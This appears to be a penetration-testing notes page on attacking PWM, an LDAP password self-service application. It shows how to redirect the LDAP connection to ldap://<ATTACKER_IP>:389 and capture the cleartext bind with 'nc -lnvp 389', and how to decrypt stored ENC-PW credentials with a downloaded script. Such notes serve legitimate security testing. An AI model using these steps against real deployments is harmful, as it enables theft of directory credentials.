PWM

PRIMARY CATEGORY → WEB TECHNOLOGIES

Theory

An open source password self-service application for LDAP directories.

Modes

Open Configuration

This PWM mode allows to gather some interesting information without any prior authentication required

Zoom in

However, authentication is still required to carry any action that involves change or modify configured parameters within the control panel

Zoom in

---

Forcing LDAP Connection to retrieve Plain Credentials

Once we obtain valid credentials to authenticate ourselves against the PWM control panel, we can look for any configured LDAP connection, as it usually contains LDAP credentials

Configuration Editor → LDAP → LDAP Directories → <DIRECTORY> → Connection

Zoom in

However, we cannot extract the LDAP plain password from the connection section, as it’s stored encrypted within the PwmConfiguration.xml file

Zoom in

PwmConfiguration.xml

<SNIP>
<value>ENC-PW:SbynUzwVEFXBLHfFwVwcL0...<SNIP>...TYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPI8=</value>
<SNIP>

But we can replace the existing LDAP URL with the below

ldap://<ATTACKER_IP>:389

Doing so, when we click on the Test LDAP Profile button, the application will perform an LDAP bind against our server, as we replace ldaps with ldap, the data will be transmitted with no encryption, so we can grab the plain credentials

It’s not necessary to set up an LDAP Server, we can handle the incoming LDAP authentication by setting up a TCP listener on port 389 as follows

nc -lnvp 389

---

Decrypting stored LDAP Credentials

Another way to extract LDAP credentials in plain text from PWM would be by decrypting stored credentials within the PwmConfigurationFile.xml

If we have valid credentials to authenticate against the PWM control panel, we can export this configuration file from the PWM Configuration Manager

Zoom in

Once we have download it, it’s as simple as follows

Downloading a PWM Decryption Utility

PWM_decrypt.py

curl --silent --location --request GET --remote-name 'https://gist.github.com/hadrian3689/471f0942588529a353c0020eaea5ddc2/raw/4a3d27c311a684f41729caa4f56728fbb924243e/pwm_decrypt.py'

Replacing data within the utility

The tool in question does not have a parameter parser, so we must replace the following information with the appropiate values

• Key

Parameter

key = "<VALUE>StoredConfiguration"

Value

CreateTime’s value

...<SNIP>...<PwmConfiguration createTime="2022-08-11T01:46:23Z"...<SNIP>...

• Encrypted Text

Parameter

encrypted_text = "<VALUE>"

Value

Base64 String w/o ENC-PW

<value>ENC-PW:SbynUzwVEFXBLHfFwVwcL0wdJhqOB0oaXb3QkEXCvJ3LyHo6pJ0q327iwGi0WW51TYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=</value>

Decrypting the data

Setup

mkdir PWMDecrypt
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install pycryptodome

Usage

python3 pwm_decrypt.py

Command Output

Decrypted text: {"salt":"<SALT>","value":"<PLAIN_PASSWD>"}

---

Resources

PWM

PWM Decrypt